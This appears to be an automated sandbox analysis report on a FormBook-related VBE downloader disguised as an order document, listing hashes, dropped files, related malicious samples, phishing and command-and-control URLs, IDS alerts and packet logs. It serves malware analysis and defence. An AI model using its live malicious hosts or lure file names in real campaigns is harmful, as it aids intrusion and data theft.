                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Narudzba ACH0036173.vbe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winVBE@17/8@4/3
                                          EGA Information:
                                          • Successful, ratio: 40%
                                          HCA Information:
                                          • Successful, ratio: 83%
                                          • Number of executed functions: 113
                                          • Number of non-executed functions: 185
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbe
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 1068 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 5812 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:49:44 | API Interceptor | 84x Sleep call for process: powershell.exe modified
08:51:37 | API Interceptor | 6x Sleep call for process: msinfo32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
162.159.140.237 | http://pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.html | malicious | HTMLPhisher | pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.html
162.159.140.237 | http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html | malicious | HTMLPhisher | pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html
162.159.140.237 | http://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html | malicious | HTMLPhisher | pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html
162.159.140.237 | http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html | malicious | HTMLPhisher | pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html
162.159.140.237 | http://pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.html | malicious | HTMLPhisher | pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.html
162.159.140.237 | http://pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.html | malicious | HTMLPhisher | pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.html
162.159.140.237 | http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html | malicious | HTMLPhisher | pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html
162.159.140.237 | http://pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.html | malicious | HTMLPhisher | pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.html
162.159.140.237 | http://pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.html | malicious | Outlook Phishing, HTMLPhisher | pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.html
162.159.140.237 | http://pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.html | malicious | HTMLPhisher | pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.html
84.32.84.32 | -pdf.bat.exe | malicious | FormBook | www.dfmagazine.shop/7k8f/
84.32.84.32 | DHL_ 46773482.exe | malicious | FormBook | www.agilizeimob.app/bnrj/
84.32.84.32 | Order.exe | malicious | FormBook | www.servehimfoundation.org/wlo5/
84.32.84.32 | Quote #260924.exe | malicious | FormBook | www.thepeatear.online/lu5k/
84.32.84.32 | Order 001-1.exe | malicious | FormBook | www.servehimfoundation.org/wlo5/
84.32.84.32 | Product Data Specifications_PDF.exe | malicious | FormBook | www.dfmagazine.shop/wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT
84.32.84.32 | PO5118000306 pdf.exe | malicious | FormBook | www.agilizeimob.app/zkp2/
84.32.84.32 | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | www.dfmagazine.shop/7k8f/
84.32.84.32 | QlHhDu2uh1.exe | malicious | FormBook | www.dfmagazine.shop/wc8m/?vlJ0J=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhLN2h2DTK9csfh9AcreeAGSJ1TcJEV0fpWOmE9rV6P4iWQH1GQ0=&HDJP=Pnl8G6jPyrn
84.32.84.32 | PO23100072.exe | malicious | FormBook | www.agilizeimob.app/we8s/
38.55.251.233 | Revised Invoice H000127896.exe | malicious | FormBook | www.kuaimaolife.shop/j39u/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.kuaimaolife.shop | Revised Invoice H000127896.exe | malicious | FormBook | 38.55.251.233
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | http://ipscanadvsf.com | malicious | Unknown | 84.32.84.33
NTT-LT-ASLT | GEJMING DUO USD 20241002144902.docx.doc | malicious | Remcos | 84.32.44.139
NTT-LT-ASLT | -pdf.bat.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | BDncqpUxZl.dll | malicious | BumbleBee | 84.32.84.32
NTT-LT-ASLT | Midjourney.msi | malicious | Unknown | 84.32.84.32
NTT-LT-ASLT | BDncqpUxZl.dll.dll | malicious | BumbleBee | 84.32.84.32
NTT-LT-ASLT | Midjourney.msi | malicious | Unknown | 84.32.84.32
NTT-LT-ASLT | DHL_ 46773482.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Report-41952.lnk | malicious | Unknown | 84.32.84.32
NTT-LT-ASLT | PO#001498.exe | malicious | FormBook | 84.32.84.32
COGENT-174US | 81zBpBAWwc.exe | malicious | RHADAMANTHYS | 143.244.42.106
COGENT-174US | https://jhansalazar.weebly.com/ | malicious | Unknown | 38.91.45.7
COGENT-174US | -pdf.bat.exe | malicious | FormBook | 38.47.207.146
COGENT-174US | BDncqpUxZl.dll | malicious | BumbleBee | 38.180.144.181
COGENT-174US | Midjourney.msi | malicious | Unknown | 38.180.144.181
COGENT-174US | https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845 | malicious | Unknown | 38.180.68.202
COGENT-174US | http://Warehousingpro.com | malicious | Unknown | 170.75.167.85
COGENT-174US | BDncqpUxZl.dll.dll | malicious | BumbleBee | 38.180.144.181
COGENT-174US | Midjourney.msi | malicious | Unknown | 38.180.144.181
COGENT-174US | DHL_ 46773482.exe | malicious | FormBook | 38.47.233.65
CLOUDFLARENETUS | Windows PowerShell.lnk | malicious | Unknown | 104.25.234.53
CLOUDFLARENETUS | c1#U09a6.exe | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | XWorm.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | bomb.exe | malicious | Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar | 104.21.86.200
CLOUDFLARENETUS | S4dd5N5VuJ.lnk | malicious | Unknown | 172.67.188.77
CLOUDFLARENETUS | Iv7LiW8Jwu.lnk | malicious | Unknown | 172.67.143.87
CLOUDFLARENETUS | Bukti-Transfer...exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | https://wide-loads.powerappsportals.com/ | malicious | Unknown | 104.18.2.157
CLOUDFLARENETUS | https://cedars-sinai-enterprise.dicomgrid.com/worklist/ | malicious | Unknown | 104.18.17.5
CLOUDFLARENETUS | rfc[1].html | malicious | Unknown | 172.67.41.60
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Windows PowerShell.lnk | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | sj9eYmr725.exe | malicious | Quasar | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | iOD95iHt4G.exe | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | iOD95iHt4G.exe | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | hkN23TcCdh.exe | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | Iv7LiW8Jwu.lnk | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | hkN23TcCdh.exe | malicious | Unknown | 162.159.140.237
3b5074b1b5d032e5620f69f9f700ff0e | Tcbnyqc7Cr.exe | malicious | DCRat | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | file.dll | malicious | Matanbuchus | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | rpedido-00035.exe | malicious | FormBook, GuLoader | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | w2TxCv1zA8.msi | malicious | Unknown | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | RNKJUiDSbh.dll | malicious | Unknown | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | RNKJUiDSbh.dll | malicious | Unknown | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | Setup.exe | malicious | Unknown | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | App_installer32_64x.exe | malicious | CredGrabber, Meduza Stealer | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | setup_run.exe | malicious | CredGrabber, Meduza Stealer | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | presupuesto urgente.exe | malicious | FormBook, GuLoader | 162.159.140.237
37f463bf4616ecd445d4a1937da06e19 | -pdf.bat.exe | malicious | GuLoader | 162.159.140.237
                                          No context
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                          Malicious:false
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:NlllulVmdtZ:NllUM
                                          MD5:013016A37665E1E37F0A3576A8EC8324
                                          SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                          SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                          SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                          Malicious:false
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\SysWOW64\msinfo32.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):482916
                                          Entropy (8bit):5.862637552716462
                                          Encrypted:false
                                          SSDEEP:12288:ub5qPXbRBYx2/5vWvEpBYGUAAEo4y2EgzLNp:ub0bRixc+QBFAP4y2EgzLNp
                                          MD5:06CFF17E73868FBB3A7A3C648C95A7BB
                                          SHA1:92C9DC0411D24BEBCE67E5165109AD359E3D01C3
                                          SHA-256:014AB21D695D7E93CF507C674AF68D27108DDE4BA1230B088B38A961A596DFA7
                                          SHA-512:92191BD8A6C2F7E1B2249F7D4D4B63F4CD99EFB71F97C9BE559800AEA841D6FB87C105E2364230088F2232CCED5286540269FE337C5CEAE4B279CF95AD8F2A9C
                                          Malicious:false
                                          File type:ASCII text, with CRLF line terminators
                                          Entropy (8bit):5.187776309441502
                                          TrID:
                                          • Visual Basic Script (13500/0) 100.00%
                                          File name:Narudzba ACH0036173.vbe
                                          File size:15'503 bytes
                                          MD5:824bafbe5495192cebc5804b329f3094
                                          SHA1:2b0bdbb8bdd2b2a1c85f18830c52c221f83a2948
                                          SHA256:dea03e99875a3cac75ed89dcc01f854f085ff13a9dfb406e25955e36668fde47
                                          SHA512:e66b1f77ad67d14f90656b60bce89b37056eef8d951f53717e615935580615c3eacc5d9b705ce997c1e0642e001363dac7a6a8480e31690698a9d8b424f4ae5d
                                          SSDEEP:192:WuvJOe4C9E+pNiERT050mbxFlWlequJm2KWQa1wgKSNdL+R6ENQDXnpwAm/JdS5j:+K9R7JmXXWlbuznZnENQeJ8QS
                                          TLSH:09627201E90A2BDD2DD7277C0CE0E0386EFA84F2993D5410B5BD4EBD25068879FA4BD8
                                          File Content Preview:..Pistache = Charles......Alungarvningerssc10 = Right("Regimentally",128)....Const Plowjogger = "Frdelslovgivnings telexen,"..Const belight = &HFFFF400D..Const Diaphanoscopy = &HC969..Const Unclaiming = -42283..Const Analyserammen70 = &HFFFF716C..Const Me
                                          Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-05T14:50:25.120627+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49737 | 162.159.140.237 | 443 | TCP
2024-10-05T14:51:15.879361+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49946 | 84.32.84.32 | 80 | TCP
2024-10-05T14:51:39.172827+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50008 | 84.32.84.32 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 5, 2024 14:49:48.286879063 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287298918 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287341118 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287370920 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287379026 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287405968 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287420034 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287542105 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287585020 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287607908 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287616014 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.287642002 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.287657022 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288449049 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288499117 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288522005 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288530111 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.288549900 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.288563967 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377482891 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377531052 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377626896 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377652884 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377676964 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377696991 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377717972 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.377734900 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377868891 CEST44349730162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:49:48.377917051 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:49:48.380898952 CEST49730443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.183677912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.183720112 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.183793068 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.195125103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.195158005 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.659120083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.659215927 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.842623949 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.842653036 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.843502045 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:24.843574047 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.848458052 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:24.891407967 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120465040 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120512009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120543003 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120568037 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120568991 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120594025 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120605946 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120619059 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120642900 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120646954 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.120662928 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.120691061 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.121165037 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.121213913 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.121360064 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.121407032 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125262976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125329018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125351906 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125355959 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.125372887 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.125417948 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.206996918 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207056999 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207057953 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207071066 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207148075 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207411051 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207461119 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207506895 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207511902 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207552910 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207560062 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207895041 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.207951069 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.207959890 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208014965 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208017111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208026886 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208056927 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208075047 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208734989 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208780050 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.208784103 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.208825111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209104061 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209147930 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209155083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209192991 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209197044 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209218025 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209238052 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209242105 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.209260941 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.209295034 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210021019 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210068941 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210072041 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210083008 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210113049 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210144043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.210146904 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.210200071 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.211864948 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.211915970 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.212080956 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.212126970 CEST49737443192.168.2.4162.159.140.237
